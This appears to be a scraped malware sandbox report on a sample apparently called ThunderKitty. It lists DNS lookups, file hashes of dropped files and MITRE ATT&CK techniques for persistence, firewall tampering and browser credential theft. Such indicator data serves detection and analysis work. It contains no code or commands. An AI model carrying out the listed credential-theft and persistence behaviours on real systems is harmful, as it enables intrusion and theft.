8.8.8.8:53

raw.githubusercontent.com

dns

ipconfig.exe

71 B
135 B
1
1

DNS Request

raw.githubusercontent.com

DNS Response

185.199.108.133

185.199.109.133

185.199.111.133

185.199.110.133
8.8.8.8:53

133.108.199.185.in-addr.arpa

dns

ipconfig.exe

74 B
118 B
1
1

DNS Request

133.108.199.185.in-addr.arpa
8.8.8.8:53

g.bing.com

dns

ipconfig.exe

56 B
151 B
1
1

DNS Request

g.bing.com

DNS Response

13.107.21.237

204.79.197.237
8.8.8.8:53

83.210.23.2.in-addr.arpa

dns

ipconfig.exe

70 B
133 B
1
1

DNS Request

83.210.23.2.in-addr.arpa
8.8.8.8:53

72.32.126.40.in-addr.arpa

dns

ipconfig.exe

71 B
157 B
1
1

DNS Request

72.32.126.40.in-addr.arpa
8.8.8.8:53

237.21.107.13.in-addr.arpa

dns

ipconfig.exe

72 B
158 B
1
1

DNS Request

237.21.107.13.in-addr.arpa
8.8.8.8:53

55.36.223.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

55.36.223.20.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Network Service Discovery

T1046

Permission Groups Discovery

T1069

Local Groups

T1069.001

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

System Network Connections Discovery

T1049

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
db5c65c5bb3a0b8a1babd09b9689bba2

SHA1
c6b985c3ba6cd5541051f280e42d3ebdda34ba35

SHA256
e813a8003afc17037bc8d36e9a2e6df1f089191e47fcb93bccc9130f4974f7d4

SHA512
23698b318565b650ed44abef445a3548283ac7bc270a432421acb16c03a3593e4c56a5e65c6c5fe721dad0e41e0c6f929ac1350249a47788ea68f66083021762

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
539bc6eade29a52ea94d29ad1f200dbf

SHA1
4d6218efa5d118f957a0df5f4e62432ab5f41bc3

SHA256
829cb8009ad74773786c5195939948365c1ca2fa70abcd2d3b10eb48393337f9

SHA512
b1b230bfd72e14d044b3db6fa738cda1110ff6137cd4b9dcfc5fb45a64fb93610584971573073e575b0f2e46015ac2f0c2e4ab66101f266ec5a9ab8a31dea089

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES9395.tmp

Filesize
1KB

MD5
7a961d579a10b9f4f59daf327c36a45d

SHA1
9426663308cee41dae37db45d7e70b5fc4a3c12e

SHA256
63fd6218df55710884867baff834b916c18ebfc3e253362d3675c78f5525d128

SHA512
7333489ce5b4268b76e376069389e62fad70be711f3fc1aeef1a959ba9fe549f8eabba52e04e9274da54511be463be3b80fdb65f455cb2309d5c5e747ff8285a

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES9396.tmp

Filesize
1KB

MD5
dcce57488f700c9f99dfee32bf537758

SHA1
0e7a169b94dddf9e5c6d7cad760982ab516aa24a

SHA256
7bb267f28bec78bd73031d067ae67d8d7eaadfb17d8ea0ccf72d8b68e93bccab

SHA512
78b484a602087c34a86f973e48ce4bdf994a4aac85e89f160822775d336cbb0423873c31857c23df69f9d244f1f2c146e4a19bf1037d94cd8a810184f156e948

Download Submit
C:\Users\Admin\AppData\Local\Temp\ThunderKitty.zip

Filesize
77KB

MD5
b82699a2c28d371feab8e7b700784d60

SHA1
33bab83b93137fffb895840760a780be5a504ab5

SHA256
b39f258931867a756b731f31f95f89381fa3f6de0f7c7ca99ed08c4b1a4c03f6

SHA512
8909f6d94b4ebab8f8c889ffbd0a6a34890417f569be36fe901310c1f725e4966c2571bdd64186395cbd999c2534b408b0cdae4993bc8a1910a9520f6a8eb43d

Download Submit
C:\Users\Admin\AppData\Local\Temp\ThunderKitty\SystemInfo\ThunderKitty-ScrapedCMDS.txt

Filesize
61KB

MD5
20367132bbdb4a8bc6384e3a4fd811d2

SHA1
a9b059c3755c280c32442c6f25388797ddeae7ca

SHA256
e63548726882e2594626481de06a639b2db3d8a687451f204c09ff570120b2fd

SHA512
d0266a252b288cb67c9e16eb9681f83cb67212f3c54e289a2249848651a3b5cf80ff63fe808541bdf2df01d88416c3e209f1accc46cbff514f872939b75271f8

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ql5cpcvh.jhi.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\qwzcr3nm\qwzcr3nm.dll

Filesize
4KB

MD5
20d0a4f8ccbea18bbeb81ece18e8d117

SHA1
a6d0f26cba4da989604c7347ae02ab8124265b79

SHA256
99a20c837b5b1b03b0eeaf941809ac46b0c180d90c7698b05cc21169ae2b004d

SHA512
7157bf3a9b29e259d064c3b857b9ebc1b3f4984ccba7fb29f497f49b76c30f5fad8e3a961e7c9e3fe51376874e6f095350066d16ad410fec03b6a05601e57b39

Download Submit
C:\Users\Admin\AppData\Local\Temp\vp3movdc\vp3movdc.dll

Filesize
4KB

MD5
9b971d9ea5c640f159b94ff6fde3c158

SHA1
53558d242c727c30dd8637a4b8aa7cb650eb3fae

SHA256
7d6b70b7c4db978c8d90854a01f55423e260988caf6f71fce4b764f289ee3e53

SHA512
d430a293e079ce5625ac688bd5e85530a739b40a7239796cc6c13925ccb10a776d9029e94f252689e1652f842a9cdc8dd4a53a6cf87f72d9947898216dfda23f

Download Submit
C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1

Filesize
2KB

MD5
9758656bbe8589c66bb241b052490c72

SHA1
b73da83fb3ae6b86c6365769a04de9845d5c602c

SHA256
e4bfe191530cc53138c4a265755539f8a115f7828faba79dfac91f3184b26351

SHA512
da9a8ecba8c2071e467f2d72fac524843fb0011c8486dd95e8b948b1c7f91bf02bcb80c20a01eddb6971b96db5ebde5f7c4c607e6b6d15e75d971ea104436e34

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
2KB

MD5
33963639fb0ee0d79107103504711c9e

SHA1
b5c525632b94582ac863c600bc613ab658fab61b

SHA256
c2d71376ebf448ca83881ffed011973822c8f755a563b1087214bf571692ad89

SHA512
b61a4f6b3a81aac3dd9a35d837232562c5d927647a639ef6eb728479f947d63f32889371f438b3bbf075ec9bbbe81cd0b06c4647d4329d74eaa4dc979ad6787d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qwzcr3nm\CSCE265A0B6DDB64834B851568920694CAC.TMP

Filesize
652B

MD5
d817cfcee2b130ddb3684f6d280a99af

SHA1
b90e87b1b41f5c6bc53df5d04ad40376ea6453fe

SHA256
232afbb9c513fe57bd89dba3d47c155b49572b2a050095691ad4c60f6118b667

SHA512
ceae5a85a9f5124a074da33292bbf066a1eb1cc8c83bb14302a7e04f3ecafdf9ab5f961950d8b30ed5d60d5d35f93ab3f877c40dd7d4b039b4d4d9191e46d377

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qwzcr3nm\qwzcr3nm.0.cs

Filesize
1KB

MD5
8a1e7edb2117ec5dde9a07016905923b

SHA1
0155dbeeb16333e2eaa767b0209750efee56f47f

SHA256
c379ac84c970f2055851b084c44575a5e4b5a70dc25f0acdd49aad306489b007

SHA512
4ff0601803a006c661c962fe158cd5e9f40031d6b4fd7c5a05969a52d812e1fcb0aab20916fcad6c61c6d44cc7cfdf1e4f344f22ced937a0cd757ad841d3ab21

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qwzcr3nm\qwzcr3nm.cmdline

Filesize
369B

MD5
c48d7cec3b8399ee008d5ff92da980f1

SHA1
f3abb3ea4468be5f181c1d88ad59912d85987251

SHA256
1ee74d9ecbe2c24875e967b28e52abaa7a29332bca939fb1a773ceef8c3b46f3

SHA512
08b9a2082dad07af1a12a55838123dd05bcd15aedc1759705b3c0bb8e326e6d90c32ce2a04af3c1e59797e2c6d478d6d622ed5adeb0724c4e292aadc541b10a7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\vp3movdc\CSCCEC06B077B884009AFF8CB25DBE50B2.TMP

Filesize
652B

MD5
7683e5299acd20d7faa6aa9ceddf3fa8

SHA1
12ce5ea20addd2b2ff23c6321bc99f8e59c9bc81

SHA256
2328e372c086c72f41db6239c626ea4787c09c8e946fae1b180c0c4b9c4e093d

SHA512
7eebe61e2885df99c9551cb20083520b908f74aa7bd410638671a6fcd9ad6067153adc434e620018bca2dfc09e1c7273051eb60d95840c1c54fe24b68f4e631b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\vp3movdc\vp3movdc.cmdline

Filesize
369B

MD5
91ca988680642cea6eb9b588c3285b1e

SHA1
7d68fe78fcdd5fe879acd394fc6b9d4086bff096

SHA256
14a43c566555c42ab488aca898cab251b71415655e19dc5308172e17f56d37b2

SHA512
1157e01586a1f7a9379f1f9e2bf627f7982644940e3a8b2ab81328f45e5cc3830d656998cc18f7656fcd0104db54e9a347101ee0e20353fc0851c6b07fea7066

Download Submit
memory/4808-82-0x0000016F70AF0000-0x0000016F70B1A000-memory.dmp

Filesize
168KB

Download
memory/4808-66-0x0000016F70510000-0x0000016F70518000-memory.dmp

Filesize
32KB

Download
memory/4808-71-0x0000016F70E30000-0x0000016F715D6000-memory.dmp

Filesize
7.6MB

Download
memory/4808-131-0x00007FF81C160000-0x00007FF81CC21000-memory.dmp

Filesize
10.8MB

Download
memory/4808-83-0x0000016F70AF0000-0x0000016F70B14000-memory.dmp

Filesize
144KB

Download
memory/4808-122-0x0000016F70AE0000-0x0000016F70AEA000-memory.dmp

Filesize
40KB

Download
memory/4808-10-0x00007FF81C160000-0x00007FF81CC21000-memory.dmp

Filesize
10.8MB

Download
memory/4808-121-0x0000016F70AF0000-0x0000016F70B02000-memory.dmp

Filesize
72KB

Download
memory/4808-6-0x00007FF81C160000-0x00007FF81CC21000-memory.dmp

Filesize
10.8MB

Download
memory/4808-30-0x00007FF81C160000-0x00007FF81CC21000-memory.dmp

Filesize
10.8MB

Download
memory/4888-69-0x000001E0039A0000-0x000001E0039A8000-memory.dmp

Filesize
32KB

Download
memory/4888-94-0x00007FF81C160000-0x00007FF81CC21000-memory.dmp

Filesize
10.8MB

Download
memory/4888-16-0x000001E0039B0000-0x000001E0039D2000-memory.dmp

Filesize
136KB

Download
memory/4888-4-0x00007FF81C160000-0x00007FF81CC21000-memory.dmp

Filesize
10.8MB

Download
memory/4888-40-0x00007FF81C160000-0x00007FF81CC21000-memory.dmp

Filesize
10.8MB

Download
memory/4888-2-0x00007FF81C163000-0x00007FF81C165000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Response

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.